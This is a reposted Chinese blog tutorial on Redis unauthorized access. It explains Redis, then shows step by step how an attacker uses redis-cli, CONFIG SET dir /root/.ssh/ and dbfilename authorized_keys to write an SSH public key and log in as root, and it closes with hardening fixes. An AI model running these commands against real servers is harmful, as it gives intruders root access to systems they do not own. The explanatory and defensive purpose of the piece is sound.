【转】详解Redis数据库配置不当遭恶意入侵过程

Redis数据库简介
Redis(REmote DIctionary Server)是一款开源、支持网络、基于内存的高级键值对(Key-Value)存储数据库,其使用C语言编写实现。Redis通常被称为数据结构服务器,因为数据库中键(Key)的值(Value)可以是字符串、哈希表、列表、集合、有序集合等各种数据结构。
Redis是内存数据库,因为其将全部的数据都存储在内存之中,传统的数据库如MySQL、SQLite等都是磁盘数据库(数据存储在磁盘上)。在关闭Redis之前,应当对内存中的数据进行备份,否则数据会丢失,不过,Redis支持定期自动备份内存中的数据到磁盘上。
Redis是非关系型数据库,即NoSQL(Not Only SQL)。其数据存储不需要固定的表格模式,不使用SQL作为查询语言。

ssh-keygen
ssh-keygen命令用于为“ssh”生成、管理和转换认证密钥

redis 未授权访问
redis 以前就被曝未授权访问,redis 默认情况下,没有配置登陆密码,任意用户可以登录,造成数据泄露,通过进一步操作还可以拿到webshell。不懂得可以去这里学习下,有配套的实验环境和挺详细的指导书。
Redis数据库安全攻防实践

最近Redis服务被曝出因配置不当,可能造成数据库被恶意清空,或被黑客利用写入后门文件造成进一步入侵。
下面我来简单演示下
首先在攻击机上直接连接被攻击机,可以看到是需要密码的。

下面我们通过redis 未授权访问来拿到目标机的root权限。
我们先在攻击机生成一个公钥。

我们可以在~/.ssh 目录下看到生成的公钥和私钥文件

我们只要把生成的公钥文件传到其他机器的~/.ssh/目录下并且重命名为authorized_keys(默认的是这个文件,可以在/etc/ssh/sshd_config里修改),那么就可以不需要root 也能登陆目标机器了。
我们这里利用redis 的未授权访问来达到目的。
我们先把公钥保存txt 文件里

在前后加入两个回车,是为了我们的公钥在被写入目标机器的authorized_keys文件时是在新的一行以保证写入的公钥文件有效。
执行以下命令
cat test.txt | redis-cli -h 10.1.1.94 -x set redis

然后登陆redis,执行以下命令
CONFIG SET dir /root/.ssh/? ? ? ? ? ? ? ? 设置备份路径为/root/.ssh/
CONFIG SET dbfilename “authorized_keys” //设置备份文件名为authorized_keys
Save? ? ? ? //保存数据到磁盘


这样就可以用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆。

漏洞修复
1、指定redis服务使用的网卡
在 redis.conf 文件中找到 “# bind 127.0.0.1” ,把前面的#号去掉,然后保存。注:修改后只有本机才能访问redis。

2、设置访问密码
在 redis.conf 中找到“requirepass”字段,在后面填上你需要的密码。

3、修改redis服务运行账号
请以较低权限账号运行redis服务,且禁用该账号的登录权限。

注意:redis 需要重启生效。

发表评论

电子邮件地址不会被公开。 必填项已用*标注